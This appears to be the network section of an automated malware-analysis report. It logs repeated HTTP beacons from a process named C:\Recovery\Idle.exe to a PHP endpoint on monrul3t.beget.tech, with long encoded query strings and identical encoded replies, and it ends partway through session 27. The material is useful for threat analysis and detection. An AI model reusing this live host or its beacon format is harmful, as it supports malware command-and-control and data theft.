                                                                                            Jan 11, 2025 18:08:26.479104996 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulUeNp2T5VlaPlXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:27.263874054 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            14 | 192.168.2.4 | 53892 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:32.276891947 CET | 2973 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:33.038233042 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            15 | 192.168.2.4 | 53923 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:38.089009047 CET | 2949 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:08:38.841630936 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            16 | 192.168.2.4 | 53924 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:43.861398935 CET | 2973 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:44.598997116 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            17 | 192.168.2.4 | 53925 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:49.621448994 CET | 2973 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:50.353018999 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            18 | 192.168.2.4 | 53926 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:08:55.370501995 CET | 2973 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:56.127232075 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            19 | 192.168.2.4 | 53927 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:01.135586977 CET | 2947 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:01.909024000 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            20 | 192.168.2.4 | 53928 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:06.939486980 CET | 2973 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:07.670844078 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            21 | 192.168.2.4 | 53929 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:12.683829069 CET | 2949 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:13.424633980 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            22 | 192.168.2.4 | 53930 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:18.432204008 CET | 2973 | OUT | GET /c243cb78.php?[TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:19.138179064 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:18 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            23 | 192.168.2.4 | 53931 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:24.151141882 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulUeFp2T1UlaPBTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:24.892333984 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            24 | 192.168.2.4 | 53932 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:29.902348995 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEeVp2TwUlaPJTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:30.675657034 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            25 | 192.168.2.4 | 53933 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:35.697709084 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulENJp2Tx0kaPNTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:36.418359995 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            26 | 192.168.2.4 | 53934 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:41.433372974 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0MBp2T0EkaPVTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:42.175010920 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            27 | 192.168.2.4 | 53935 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
